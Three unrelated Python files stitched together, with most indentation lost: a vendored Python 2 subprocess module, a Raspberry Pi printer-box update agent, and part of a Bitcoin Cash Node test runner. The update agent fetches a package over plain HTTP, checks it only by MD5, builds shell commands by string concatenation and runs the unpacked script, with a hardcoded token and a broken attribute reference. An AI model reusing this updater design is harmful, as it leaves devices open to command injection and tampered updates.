return Popen(*popenargs, **kwargs).wait()
def check_call(*popenargs, **kwargs):
retcode = call(*popenargs, **kwargs)
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
if retcode:
raise CalledProcessError(retcode, cmd)
return retcode
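# Hedged usage of the two helpers above (commands are examples only):
#   call(["true"])            # returns the exit status, here 0
#   check_call(["false"])     # raises CalledProcessError(1, ["false"])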
def list2cmdline(seq):
result = []
needquote = False
for arg in seq:
bs_buf = []
if result:
result.append(' ')
needquote = (" " in arg) or ("\t" in arg) or arg == ""
if needquote:
result.append('"')
for c in arg:
if c == '\\':
bs_buf.append(c)
elif c == '"':
result.append('\\' * len(bs_buf)*2)
bs_buf = []
result.append('\\"')
else:
if bs_buf:
result.extend(bs_buf)
bs_buf = []
result.append(c)
if bs_buf:
result.extend(bs_buf)
if needquote:
result.extend(bs_buf)
result.append('"')
return ''.join(result)
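# Quoting sketch for list2cmdline(), following the MS C runtime rules it
# implements (outputs shown as illustration):
#   list2cmdline(["echo", "hello world"])  # -> 'echo "hello world"'
#   list2cmdline(["a b", ""])              # -> '"a b" ""'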
class Popen(object):
def __init__(self, args, bufsize=0, executable=None,
stdin=None, stdout=None, stderr=None,
preexec_fn=None, close_fds=False, shell=False,
cwd=None, env=None, universal_newlines=False,
startupinfo=None, creationflags=0):
_cleanup()
self._child_created = False
if not isinstance(bufsize, (int, long)):
raise TypeError("bufsize must be an integer")
if mswindows:
if preexec_fn is not None:
raise ValueError("preexec_fn is not supported on Windows platforms")
if close_fds:
raise ValueError("close_fds is not supported on Windows platforms")
else:
if startupinfo is not None:
raise ValueError("startupinfo is only supported on Windows platforms")
if creationflags != 0:
raise ValueError("creationflags is only supported on Windows platforms")
self.stdin = None
self.stdout = None
self.stderr = None
self.pid = None
self.returncode = None
self.universal_newlines = universal_newlines
(p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite) = self._get_handles(stdin, stdout, stderr)
self._execute_child(args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
if mswindows:
if stdin is None and p2cwrite is not None:
os.close(p2cwrite)
p2cwrite = None
if stdout is None and c2pread is not None:
os.close(c2pread)
c2pread = None
if stderr is None and errread is not None:
os.close(errread)
errread = None
if p2cwrite:
self.stdin = os.fdopen(p2cwrite, 'wb', bufsize)
if c2pread:
if universal_newlines:
self.stdout = os.fdopen(c2pread, 'rU', bufsize)
else:
self.stdout = os.fdopen(c2pread, 'rb', bufsize)
if errread:
if universal_newlines:
self.stderr = os.fdopen(errread, 'rU', bufsize)
else:
self.stderr = os.fdopen(errread, 'rb', bufsize)
def _translate_newlines(self, data):
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
return data
def __del__(self, sys=sys):
if not self._child_created:
return
self.poll(_deadstate=sys.maxint)
if self.returncode is None and _active is not None:
_active.append(self)
def communicate(self, input=None):
if [self.stdin, self.stdout, self.stderr].count(None) >= 2:
stdout = None
stderr = None
if self.stdin:
if input:
self.stdin.write(input)
self.stdin.close()
elif self.stdout:
stdout = self.stdout.read()
elif self.stderr:
stderr = self.stderr.read()
self.wait()
return (stdout, stderr)
return self._communicate(input)
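    # Hedged usage sketch of this vendored Popen (mirrors the stdlib
    # subprocess API of the same era; the command is an example only):
    #   p = Popen(["cat"], stdin=PIPE, stdout=PIPE)
    #   out, err = p.communicate("hello")
    #   # out == "hello", err is None, p.returncode == 0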
if mswindows:
def _get_handles(self, stdin, stdout, stderr):
if stdin is None and stdout is None and stderr is None:
return (None, None, None, None, None, None)
p2cread, p2cwrite = None, None
c2pread, c2pwrite = None, None
errread, errwrite = None, None
if stdin is None:
p2cread = GetStdHandle(STD_INPUT_HANDLE)
if p2cread is not None:
pass
elif stdin is None or stdin == PIPE:
p2cread, p2cwrite = CreatePipe(None, 0)
p2cwrite = p2cwrite.Detach()
p2cwrite = msvcrt.open_osfhandle(p2cwrite, 0)
elif isinstance(stdin, int):
p2cread = msvcrt.get_osfhandle(stdin)
else:
p2cread = msvcrt.get_osfhandle(stdin.fileno())
p2cread = self._make_inheritable(p2cread)
if stdout is None:
c2pwrite = GetStdHandle(STD_OUTPUT_HANDLE)
if c2pwrite is not None:
pass
elif stdout is None or stdout == PIPE:
c2pread, c2pwrite = CreatePipe(None, 0)
c2pread = c2pread.Detach()
c2pread = msvcrt.open_osfhandle(c2pread, 0)
elif isinstance(stdout, int):
c2pwrite = msvcrt.get_osfhandle(stdout)
else:
c2pwrite = msvcrt.get_osfhandle(stdout.fileno())
c2pwrite = self._make_inheritable(c2pwrite)
if stderr is None:
errwrite = GetStdHandle(STD_ERROR_HANDLE)
if errwrite is not None:
pass
elif stderr is None or stderr == PIPE:
errread, errwrite = CreatePipe(None, 0)
errread = errread.Detach()
errread = msvcrt.open_osfhandle(errread, 0)
elif stderr == STDOUT:
errwrite = c2pwrite
elif isinstance(stderr, int):
errwrite = msvcrt.get_osfhandle(stderr)
else:
errwrite = msvcrt.get_osfhandle(stderr.fileno())
errwrite = self._make_inheritable(errwrite)
return (p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
def _make_inheritable(self, handle):
return DuplicateHandle(GetCurrentProcess(), handle, GetCurrentProcess(), 0, 1, DUPLICATE_SAME_ACCESS)
def _find_w9xpopen(self):
w9xpopen = os.path.join(os.path.dirname(GetModuleFileName(0)), "w9xpopen.exe")
if not os.path.exists(w9xpopen):
w9xpopen = os.path.join(os.path.dirname(sys.exec_prefix), "w9xpopen.exe")
if not os.path.exists(w9xpopen):
raise RuntimeError("Cannot locate w9xpopen.exe, which is needed for Popen to work with your shell or platform.")
return w9xpopen
def _execute_child(self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite):
if not isinstance(args, types.StringTypes):
args = list2cmdline(args)
if startupinfo is None:
startupinfo = STARTUPINFO()
if None not in (p2cread, c2pwrite, errwrite):
startupinfo.dwFlags |= STARTF_USESTDHANDLES
startupinfo.hStdInput = p2cread
startupinfo.hStdOutput = c2pwrite
startupinfo.hStdError = errwrite
if shell:
startupinfo.dwFlags |= STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE
comspec = os.environ.get("COMSPEC", "cmd.exe")
args = comspec + " /c " + args
if (GetVersion() >= 0x80000000L or
os.path.basename(comspec).lower() == "command.com"):
w9xpopen = self._find_w9xpopen()
args = '"%s" %s' % (w9xpopen, args)
creationflags |= CREATE_NEW_CONSOLE
try:
hp, ht, pid, tid = CreateProcess(executable, args, None, None, 1, creationflags, env, cwd, startupinfo)
except pywintypes.error, e:
raise WindowsError(*e.args)
self._child_created = True
self._handle = hp
self.pid = pid
ht.Close()
if p2cread is not None:
p2cread.Close()
if c2pwrite is not None:
c2pwrite.Close()
if errwrite is not None:
errwrite.Close()
def poll(self, _deadstate=None):
if self.returncode is None:
if WaitForSingleObject(self._handle, 0) == WAIT_OBJECT_0:
self.returncode = GetExitCodeProcess(self._handle)
return self.returncode
def wait(self):
if self.returncode is None:
obj = WaitForSingleObject(self._handle, INFINITE)
self.returncode = GetExitCodeProcess(self._handle)
return self.returncode
def _readerthread(self, fh, buffer):
buffer.append(fh.read())
def _communicate(self, input):
stdout = None
stderr = None
if self.stdout:
stdout = []
stdout_thread = threading.Thread(target=self._readerthread, args=(self.stdout, stdout))
stdout_thread.setDaemon(True)
stdout_thread.start()
if self.stderr:
stderr = []
stderr_thread = threading.Thread(target=self._readerthread, args=(self.stderr, stderr))
stderr_thread.setDaemon(True)
stderr_thread.start()
if self.stdin:
if input is not None:
self.stdin.write(input)
self.stdin.close()
if self.stdout:
stdout_thread.join()
if self.stderr:
stderr_thread.join()
if stdout is not None:
stdout = stdout[0]
if stderr is not None:
stderr = stderr[0]
if self.universal_newlines and hasattr(file, 'newlines'):
if stdout:
stdout = self._translate_newlines(stdout)
if stderr:
stderr = self._translate_newlines(stderr)
self.wait()
return (stdout, stderr)
else:
def _get_handles(self, stdin, stdout, stderr):
p2cread, p2cwrite = None, None
c2pread, c2pwrite = None, None
errread, errwrite = None, None
if stdin is None:
pass
elif stdin == PIPE:
p2cread, p2cwrite = os.pipe()
elif isinstance(stdin, int):
p2cread = stdin
else:
p2cread = stdin.fileno()
if stdout is None:
pass
elif stdout == PIPE:
c2pread, c2pwrite = os.pipe()
elif isinstance(stdout, int):
c2pwrite = stdout
else:
c2pwrite = stdout.fileno()
if stderr is None:
pass
elif stderr == PIPE:
errread, errwrite = os.pipe()
elif stderr == STDOUT:
errwrite = c2pwrite
elif isinstance(stderr, int):
errwrite = stderr
else:
errwrite = stderr.fileno()
return (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite)
def _set_cloexec_flag(self, fd):
try:
cloexec_flag = fcntl.FD_CLOEXEC
except AttributeError:
cloexec_flag = 1
old = fcntl.fcntl(fd, fcntl.F_GETFD)
fcntl.fcntl(fd, fcntl.F_SETFD, old | cloexec_flag)
def _close_fds(self, but):
for i in xrange(3, MAXFD):
if i == but:
continue
try:
os.close(i)
except:
pass
def _execute_child(self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines, startupinfo, creationflags, shell,
p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite):
if isinstance(args, types.StringTypes):
args = [args]
else:
args = list(args)
if shell:
args = ["/bin/sh", "-c"] + args
if executable is None:
executable = args[0]
errpipe_read, errpipe_write = os.pipe()
self._set_cloexec_flag(errpipe_write)
gc_was_enabled = gc.isenabled()
gc.disable()
try:
self.pid = os.fork()
except:
if gc_was_enabled:
gc.enable()
raise
self._child_created = True
if self.pid == 0:
try:
if p2cwrite:
os.close(p2cwrite)
if c2pread:
os.close(c2pread)
if errread:
os.close(errread)
os.close(errpipe_read)
if p2cread:
os.dup2(p2cread, 0)
if c2pwrite:
os.dup2(c2pwrite, 1)
if errwrite:
os.dup2(errwrite, 2)
if p2cread and p2cread not in (0,):
os.close(p2cread)
if c2pwrite and c2pwrite not in (p2cread, 1):
os.close(c2pwrite)
if errwrite and errwrite not in (p2cread, c2pwrite, 2):
os.close(errwrite)
if close_fds:
self._close_fds(but=errpipe_write)
if cwd is not None:
os.chdir(cwd)
if preexec_fn:
apply(preexec_fn)
if env is None:
os.execvp(executable, args)
else:
os.execvpe(executable, args, env)
except:
exc_type, exc_value, tb = sys.exc_info()
exc_lines = traceback.format_exception(exc_type, exc_value, tb)
exc_value.child_traceback = ''.join(exc_lines)
os.write(errpipe_write, pickle.dumps(exc_value))
os._exit(255)
if gc_was_enabled:
gc.enable()
os.close(errpipe_write)
if p2cread and p2cwrite:
os.close(p2cread)
if c2pwrite and c2pread:
os.close(c2pwrite)
if errwrite and errread:
os.close(errwrite)
data = os.read(errpipe_read, 1048576)
os.close(errpipe_read)
if data != "":
os.waitpid(self.pid, 0)
child_exception = pickle.loads(data)
raise child_exception
def _handle_exitstatus(self, sts):
if os.WIFSIGNALED(sts):
self.returncode = -os.WTERMSIG(sts)
elif os.WIFEXITED(sts):
self.returncode = os.WEXITSTATUS(sts)
else:
raise RuntimeError("Unknown child exit status!")
def poll(self, _deadstate=None):
if self.returncode is None:
try:
pid, sts = os.waitpid(self.pid, os.WNOHANG)
if pid == self.pid:
self._handle_exitstatus(sts)
except os.error:
if _deadstate is not None:
self.returncode = _deadstate
return self.returncode
def wait(self):
if self.returncode is None:
pid, sts = os.waitpid(self.pid, 0)
self._handle_exitstatus(sts)
return self.returncode
def _communicate(self, input):
read_set = []
write_set = []
stdout = None
stderr = None
if self.stdin:
self.stdin.flush()
if input:
write_set.append(self.stdin)
else:
self.stdin.close()
if self.stdout:
read_set.append(self.stdout)
stdout = []
if self.stderr:
read_set.append(self.stderr)
stderr = []
input_offset = 0
while read_set or write_set:
rlist, wlist, xlist = select.select(read_set, write_set, [])
if self.stdin in wlist:
bytes_written = os.write(self.stdin.fileno(), buffer(input, input_offset, 512))
input_offset += bytes_written
if input_offset >= len(input):
self.stdin.close()
write_set.remove(self.stdin)
if self.stdout in rlist:
data = os.read(self.stdout.fileno(), 1024)
if data == "":
self.stdout.close()
read_set.remove(self.stdout)
stdout.append(data)
if self.stderr in rlist:
data = os.read(self.stderr.fileno(), 1024)
if data == "":
self.stderr.close()
read_set.remove(self.stderr)
stderr.append(data)
if stdout is not None:
stdout = ''.join(stdout)
if stderr is not None:
stderr = ''.join(stderr)
if self.universal_newlines and hasattr(file, 'newlines'):
if stdout:
stdout = self._translate_newlines(stdout)
if stderr:
stderr = self._translate_newlines(stderr)
self.wait()
return (stdout, stderr)
|
update_api.py
|
# coding=utf-8
import sys
#sys.path.append("/home/pi/oprint/lib/python2.7/site-packages/tornado-3.0.2-py2.7.egg/")
from tornado.httpclient import AsyncHTTPClient
from tornado.httpclient import HTTPClient
from tornado.httpclient import HTTPRequest
from tornado.escape import json_decode
from tornado.escape import json_encode
import logging
import os
import ConfigParser
import urllib
import commands
import threading
#Definition of File name
#System Command
COMMAND_SUDO = "/usr/bin/sudo "
UPDATE_METADATA_DIR = "/home/pi/.update/updatePkg/"
UPDATE_METADATA_FILE = UPDATE_METADATA_DIR + "updateMeta.conf"
UPDATE_EXECUTE_FILE = "update.sh"
UPDATE_STAGE_INIT = "init"
UPDATE_STAGE_FINISHED = "finished"
UPDATE_RET_NORMAL = 0
UPDATE_RET_ERR_MD5 = 1
UPDATE_RET_ERR_UNCOMPRESS = 2
UPDATE_RET_ERR_UPDATE = 3
UPDATE_RET_ERR_UNKNOWN = 10
class ClientAgent():
def __init__(self):
BASE_PATH="/home/pi/oprint/lib/python2.7/site-packages/boxAgent-1.0.0-py2.7.egg/"
CLIENT_AGENT_CONFIG_FILE = BASE_PATH + "client.conf"
DEFAULT_CONFIG_DICT = {
"protocol" : "http",
"config_ver" : "v1.0",
"local_host" : "127.0.0.1",
"local_port" : "5000",
"update_port" : "8092",
"server_host" : "211.103.196.188",
"server_port" : 8888,
"cloud_host" : "211.103.196.188",
"cloud_port" : 8082,
"heartbeat_interval" : 10,
"token" : "w4hewb"
}
# self.http_client = AsyncHTTPClient()
config = ConfigParser.ConfigParser(DEFAULT_CONFIG_DICT)
config.readfp(open(CLIENT_AGENT_CONFIG_FILE),"rb")
self.protocol = config.get("global", "protocol") + "://"
self.config_ver = config.get("global", "config_ver")
self.localHost = config.get("global", "local_host")
self.localPort = config.get("global", "local_port")
self.localHostPort = self.localHost
if self.localPort:
self.localHostPort = self.localHost + ":" + self.localPort
self.updatePort = config.get("global", "update_port")
self.updateHostPort = self.localHost
if self.updatePort:
self.updateHostPort = self.localHost + ":" + self.updatePort
self.serverHost = config.get("global", "server_host")
self.serverPort = config.get("global", "server_port")
self.serverHostPort = self.serverHost
if self.serverPort:
self.serverHostPort = self.serverHost + ":" + self.serverPort
self.cloudHost = config.get("global", "cloud_host")
self.cloudPort = config.get("global", "cloud_port")
self.cloudHostPort = self.cloudHost
if self.cloudPort:
self.cloudHostPort = self.cloudHost + ":" + self.cloudPort
self.heartbeatInterval = config.getint("global", "heartbeat_interval")
self.token = config.get("global", "token").strip('\"')
self.latest_ver = ""
if config.has_option("update", "latest_ver"):
self.latest_ver = config.get("update", "latest_ver")
self.update_pkg_url = ""
if config.has_option("update", "pkg_url"):
self.update_pkg_url = config.get("update", "pkg_url")
self.update_pkg_md5 = ""
if config.has_option("update", "pkg_md5"):
self.update_pkg_md5 = config.get("update", "pkg_md5")
self.update_pkg_desc = "No new updates."
if config.has_option("update", "pkg_desc"):
self.update_pkg_desc = config.get("update", "pkg_desc")
logger = logging.getLogger("__name__")
client = ClientAgent()
def getCurrentBoxInfo():
"""
Get current box info.
"""
boxInfo = {}
url = client.protocol + client.localHostPort + "/getstate"
logging.debug("getCurrentBoxInfo: Start to get current box info. url=%s", url)
cur_client = HTTPClient()
response = cur_client.fetch(url, request_timeout=10)
if response.error:
logging.warn("getCurrentBoxInfo: Failed to get current box info. error=%s", response.error)
return None
logging.debug("getCurrentBoxInfo: Current box info. reponse.body=%r", response.body)
res = json_decode(response.body)
if res["ret_value"] != 0:
logging.warn("getCurrentBoxInfo: Failed to get current box info. ret_value=%d", res["ret_value"])
return None
logging.debug("getCurrentBoxInfo: getstate cmd ver. cmd_ver=%s", res["cmd_ver"])
boxInfo["id"] = res.get("id")
boxInfo["name"] = res.get("name")
boxInfo["app_ver"] = res.get("app_ver")
boxInfo["isactive"] = res.get("isactive")
boxInfo["user_name"] = res.get("user_name")
boxInfo["disk_size"] = res.get("disk_size")
boxInfo["free_disk_size"] = res.get("free_disk_size")
boxInfo["mem_size"] = res.get("mem_size")
boxInfo["free_mem_size"] = res.get("free_mem_size")
boxInfo["cpu_usage"] = res.get("cpu_usage")
boxInfo["loc_ip"] = res.get("loc_ip")
boxInfo["printer_name"] = res.get("printer_name")
boxInfo["printer_state"] = res.get("printer_state")
boxInfo["printer_length"] = res.get("printer_length", 0)
boxInfo["printer_width"] = res.get("printer_width", 0)
boxInfo["printer_height"] = res.get("printer_height", 0)
boxInfo["model_file"] = res.get("model_file",)
boxInfo["model_type"] = res.get("model_type")
boxInfo["print_time_all"] = res.get("print_time_all", 0)
boxInfo["print_time_escape"] = res.get("print_time_escape", 0)
boxInfo["print_time_remain"] = res.get("print_time_remain", 0)
boxInfo["print_progress"] = res.get("print_progress", 0)
return boxInfo
def getLatestVer():
if client.latest_ver == "":
client.latest_ver = getCurrentVer()
return client.latest_ver
def getUpdatePkgUrl():
return client.update_pkg_url
def getUpdatePkgDesc():
return client.update_pkg_desc
def getCurrentVer():
app_ver = None
boxinfo = getCurrentBoxInfo()
if boxinfo:
app_ver = boxinfo["app_ver"]
return app_ver
def clearUpdateInfoBegin():
file = UPDATE_METADATA_FILE
if os.path.exists(file):
os.remove(file)
def initUpdateInfo():
global client
client = ClientAgent()
#Initialize net update info
fileDir = UPDATE_METADATA_DIR
if os.path.isfile(fileDir):
os.remove(fileDir)
if not os.path.exists(fileDir):
os.makedirs(fileDir)
file = UPDATE_METADATA_FILE
config = ConfigParser.ConfigParser()
if not os.path.exists(file):
config.add_section("meta")
config.set("meta", "upd_pkg_name", "")
config.set("meta", "stage", UPDATE_STAGE_INIT)
config.set("meta", "progress", 0)
config.set("meta", "ret", UPDATE_RET_NORMAL)
config.write(open(file, 'w'))
return
config.readfp(open(file),"rb")
if config.get("meta", "stage") == UPDATE_STAGE_FINISHED:
config.set("meta", "upd_pkg_name", "")
config.set("meta", "stage", "init")
config.set("meta", "progress", 0)
config.set("meta", "ret", UPDATE_RET_NORMAL)
config.write(open(file, 'w'))
return
def getUpdateMeta():
file = UPDATE_METADATA_FILE
if not os.path.exists(file):
initUpdateInfo()
config = ConfigParser.ConfigParser()
config.readfp(open(file),"rb")
metaInfo = {}
metaInfo["upd_pkg_name"] = config.get("meta", "upd_pkg_name")
metaInfo["stage"] = config.get("meta", "stage")
metaInfo["progress"] = config.getint("meta", "progress")
metaInfo["ret"] = config.getint("meta", "ret")
return metaInfo
def setUpdateMeta(key, value):
file = UPDATE_METADATA_FILE
config = ConfigParser.ConfigParser()
config.read(file)
config.set("meta", key, value)
config.write(open(file, 'w'))
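# Hedged sketch of the metadata file the helpers above read and write
# (section and keys come from initUpdateInfo(); the values are examples):
#   [meta]
#   upd_pkg_name = upd_pkg_1.2.3.tgz
#   stage = downloading
#   progress = 40
#   ret = 0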
def clearUpdateInfoEnd():
config = ConfigParser.ConfigParser()
    config.read(client.config_file)
    config.remove_section("update")
    config.write(open(client.config_file, "w"))
def update_BG():
pkg_url = getUpdatePkgUrl()
fileName = 'upd_pkg_' + client.latest_ver + '.tgz'
fileDir = UPDATE_METADATA_DIR
filePath = fileDir + fileName
setUpdateMeta("stage", "downloading")
setUpdateMeta("progress", 0)
setUpdateMeta("upd_pkg_name", fileName)
def netReporthook(count, block_size, total_size):
progress = (50 * count * block_size/ total_size)
if progress > 50:
progress = 50
setUpdateMeta("progress", progress)
#if client.update_flag == "download_update":
# exeUpdatePkg()
try:
urllib.urlretrieve(pkg_url, filePath, netReporthook)
except Exception,ex:
logging.warn("update_BG: Failed to download update package. " + str(ex))
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", UPDATE_RET_ERR_UNKNOWN)
return
#check download file
md5sum = commands.getoutput("md5sum " + filePath + " | awk '{print $1}'")
if md5sum != client.update_pkg_md5:
logging.warn("update_BG: Failed to download update package. md5sum is incorrect.")
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", UPDATE_RET_ERR_MD5)
return
#uncompress update Pkg
setUpdateMeta("stage", "uncompressing")
uncompress_cmd = "tar -xvf " + filePath + " -C " + fileDir
ret = commands.getstatusoutput(uncompress_cmd)
if ret[0] != 0:
logging.warn("update_BG: Failed to uncompress package. cmd=%s. ret=%d. output=%s", uncompress_cmd, ret[0], ret[1])
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", UPDATE_RET_ERR_UNCOMPRESS)
return
#execute update Pkg
setUpdateMeta("stage", "updating")
tar_path = os.path.splitext(fileName)[0]
update_cmd = fileDir + tar_path + "/" + UPDATE_EXECUTE_FILE
print "begin" + update_cmd
ret = commands.getstatusoutput(update_cmd)
print "end" + update_cmd
if ret[0] != 0:
logging.warn("update_BG: Failed to execute update package. cmd=%s. ret=%d. output=%s", update_cmd, ret[0], ret[1])
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", 10+ret[0])
return
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", UPDATE_RET_NORMAL)
#delete updateinfo
clearUpdateInfoEnd()
return
def netUpdate():
thread = threading.Thread(target=update_BG)
thread.setDaemon(True)
thread.start()
return
if __name__ == "__main__":
    pass  # nothing to run when executed directly
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but
# are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
    # Some tests can be run with additional parameters.
    # When a test is listed here, it will be run without parameters
    # as well as with the additional parameters listed here.
    # For example:
    #   "testName" : [["--param1", "--param2"], ["--param3"]]
    # will run the test 3 times:
    #   testName
    #   testName --param1 --param2
    #   testName --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_createwallet.py": [["--usecli"]],
"wallet_multiwallet.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed
# EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
name = t
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, name, testdir, status,
int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv(
'TEAMCITY_VERSION') is not None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=os.path.join(build_dir, 'test', 'tmp'), help="Root directory for datadirs")
parser.add_argument('--junitoutput', '-J', default='junit_results.xml',
help="File that will store JUnit formatted test results. If no absolute path is given it is treated as relative to the temporary directory.")
parser.add_argument('--testsuitename', '-n', default='Bitcoin Cash Node functional tests',
help="Name of the test suite, as it will appear in the logs and in the JUnit report.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
logging.info("Starting {}".format(args.testsuitename))
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
if not os.path.isabs(args.junitoutput):
args.junitoutput = os.path.join(tmpdir, args.junitoutput)
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not enable_bitcoind:
print("No functional tests to run.")
print("Rerun ./configure with --with-daemon and then make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if test not in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
